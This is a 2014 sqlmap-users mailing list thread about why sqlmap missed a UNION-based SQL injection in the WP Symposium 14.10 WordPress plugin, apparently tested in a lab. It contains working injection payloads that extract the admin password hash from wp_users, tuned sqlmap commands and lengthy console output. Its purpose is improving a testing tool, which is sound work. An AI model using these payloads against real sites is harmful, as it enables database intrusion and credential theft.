Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
|
From: Brandon P. <bpe...@gm...> - 2014-12-15 21:23:11
|
Yeah, no worries. Was just playing around with it and was surprised sqlmap
didn't find the UNION.
I think what is happening is sqlmap is changing up the value of tray during
the union tests to negative numbers, and it is required to be 'in_deleted'
(but hey, that's what --prefix is for)
Thanks!
On Mon, Dec 15, 2014 at 2:39 PM, Miroslav Stampar <
mir...@gm...> wrote:
>
> Looking into traffic file I don't see "obvious" trails of SQLi. If you are
> satisfied with your findings I won't look any further.
>
> Bye
>
> On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...>
> wrote:
>>
>> Aha, I got it:
>>
>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o
>> --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=
>> http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#"
>> --prefix='in_deleted ' --level=5 --risk=3 -o _
>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>> |_ -| . | | | .'| . |
>> |___|_ |_|_|_|_|__,| _|
>> |_| |_| http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 09:54:50
>>
>> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
>> [09:54:50] [INFO] setting file for logging HTTP traffic
>> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
>> disabled because of its incompatibility with HTTP(s) proxy
>> [09:54:50] [INFO] testing connection to the target URL
>> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
>> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter
>> 'tray' might not be injectable
>> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
>> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [09:54:51] [WARNING] reflective value(s) found and filtering out
>> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10
>> columns'
>> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
>> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random
>> number) - 1 to 10 columns' injectable
>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>> others (if any)? [y/N] n
>> sqlmap identified the following injection points with a total of 26
>> HTTP(s) requests:
>> ---
>> Parameter: tray (POST)
>> Type: UNION query
>> Title: MySQL UNION query (random number) - 1 column
>> Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT
>> CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
>> ---
>> [09:55:02] [INFO] testing MySQL
>> [09:55:02] [INFO] confirming MySQL
>> [09:55:03] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: Apache 2.4.7, PHP 5.5.9
>> back-end DBMS: MySQL >= 5.0.0
>> [09:55:03] [INFO] fetched data logged to text files under
>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>
>> [*] shutting down at 09:55:03
>>
>> bperry@ubuntu:~/tools/sqlmap$
>>
>>
>> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <
>> bpe...@gm...> wrote:
>>>
>>> Sorry, one more thing to note, the following command gets very close to
>>> exploiting the injection:
>>>
>>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
>>> /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
>>> LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>>
>>> The only problem is that the union-char is 'f', when I was hoping it
>>> would be 0x66. When I capture the request and replace 'f' with 0x66, the
>>> injection works. Looks like ' is a bad char.
>>>
>>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>>
>>>> Playing with the queries sqlmap sends a bit more:
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>>
>>>> This results in a 0 being returned where the password hash was in the
>>>> successful injection:
>>>>
>>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>>> ^ injection result
>>>>
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>>
>>>> This payload also results in a 0 being returned, not 'fdsa' as you
>>>> would expect.
>>>>
>>>> However, this payload does return 'fdsa'
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>>> 1,1#&mid=1
>>>>
>>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>>> 1,1#[split]
>>>>
>>>>
>>>> Hope this helps.
>>>>
>>>>
>>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <
>>>> bpe...@gm...> wrote:
>>>>>
>>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>>>>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>>> _
>>>>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>>>>> |_ -| . | | | .'| . |
>>>>> |___|_ |_|_|_|_|__,| _|
>>>>> |_| |_| http://sqlmap.org
>>>>>
>>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>>> obey all applicable local, state and federal laws. Developers assume no
>>>>> liability and are not responsible for any misuse or damage caused by this
>>>>> program
>>>>>
>>>>> [*] starting at 08:56:27
>>>>>
>>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>>> [08:56:27] [INFO] flushing session file
>>>>> [08:56:27] [INFO] testing connection to the target URL
>>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>>>>> couple of seconds
>>>>> [08:56:28] [INFO] target URL is stable
>>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>>>>> 'tray' might not be injectable
>>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>>> clause'
>>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>>> clause (MySQL comment)'
>>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>>> clause (Generic comment)'
>>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>>> clause'
>>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>>> clause (MySQL comment)'
>>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>>> clause (Generic comment)'
>>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>>>>> ORDER BY or GROUP BY clause (RLIKE)'
>>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>>>>> replace (original value)'
>>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>>> replace (MAKE_SET - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>>> replace (ELT - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>>> replace (bool*int - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind -
>>>>> Parameter replace (original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>>>>> replace (original value)'
>>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>>> ORDER BY clauses'
>>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>>> ORDER BY clauses (original value)'
>>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>>>>> and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY
>>>>> and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>>> HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>>> HAVING clause (UPDATEXML)'
>>>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or
>>>>> HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>>> HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>>> HAVING clause (UPDATEXML)'
>>>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or
>>>>> HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or
>>>>> HAVING clause'
>>>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING
>>>>> clause'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter
>>>>> replace'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter
>>>>> replace (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter
>>>>> replace (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter
>>>>> replace (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and
>>>>> ORDER BY clauses'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>>> ORDER BY clauses (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>>> ORDER BY clauses (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and
>>>>> ORDER BY clauses (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy
>>>>> query)'
>>>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind
>>>>> (comment)'
>>>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>>>>> query)'
>>>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12
>>>>> AND time-based blind (heavy query)' injectable
>>>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>>>> [08:58:26] [INFO] automatically extending ranges for UNION query
>>>>> injection technique tests as there is at least one other (potential)
>>>>> technique found
>>>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1
>>>>> columns
>>>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>>>>> columns'
>>>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to
>>>>> 40 columns'
>>>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to
>>>>> 60 columns'
>>>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to
>>>>> 80 columns'
>>>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100
>>>>> columns'
>>>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to
>>>>> 100 columns'
>>>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20
>>>>> columns'
>>>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to
>>>>> 20 columns'
>>>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40
>>>>> columns'
>>>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to
>>>>> 40 columns'
>>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60
>>>>> columns'
>>>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to
>>>>> 60 columns'
>>>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80
>>>>> columns'
>>>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to
>>>>> 80 columns'
>>>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100
>>>>> columns'
>>>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>>>>> 100 columns'
>>>>> [08:58:54] [INFO] checking if the injection point on POST parameter
>>>>> 'tray' is a false positive
>>>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>>>>> others (if any)? [y/N] n
>>>>> sqlmap identified the following injection points with a total of 2049
>>>>> HTTP(s) requests:
>>>>> ---
>>>>> Parameter: tray (POST)
>>>>> Type: AND/OR time-based blind
>>>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>>>> Payload: action=getMailMessage&tray=in_deleted AND
>>>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>>>> ---
>>>>> [08:59:48] [INFO] testing MySQL
>>>>> [08:59:48] [WARNING] it is very important not to stress the network
>>>>> adapter during usage of time-based payloads to prevent potential errors
>>>>> do you want sqlmap to try to optimize value(s) for DBMS delay
>>>>> responses (option '--time-sec')? [Y/n]
>>>>> [08:59:51] [INFO] confirming MySQL
>>>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good
>>>>> response times
>>>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>>>> web server operating system: Linux Ubuntu
>>>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>>>> back-end DBMS: MySQL >= 5.0.0
>>>>> [08:59:53] [INFO] fetched data logged to text files under
>>>>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>>>>
>>>>> [*] shutting down at 08:59:53
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>>
>>>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>>>>> mir...@gm...> wrote:
>>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I don't see a reason why this form of UNION test would be any
>>>>>> different than the regular used by sqlmap. Can you please send me the
>>>>>> traffic file for such run (... --flush-session -t traffic.txt) along with
>>>>>> console output?
>>>>>>
>>>>>> Bye
>>>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>>>>>> wrote:
>>>>>>
>>>>>>> Hello!
>>>>>>>
>>>>>>> Playing around with the following vulnerabivlity:
>>>>>>>
>>>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>>>
>>>>>>>
>>>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>>>>> does result in a response from the server with the hash of the first user:
>>>>>>>
>>>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1
>>>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>>>
>>>>>>>
>>>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>>>>
>>>>>>> Just a thought!
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>>> http://www.volatileminds.net -- website
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>>>>> from Actuate! Instantly Supercharge Your Business Reports and
>>>>>>> Dashboards
>>>>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>>>>> more
>>>>>>> Get technology previously reserved for billion-dollar corporations,
>>>>>>> FREE
>>>>>>>
>>>>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
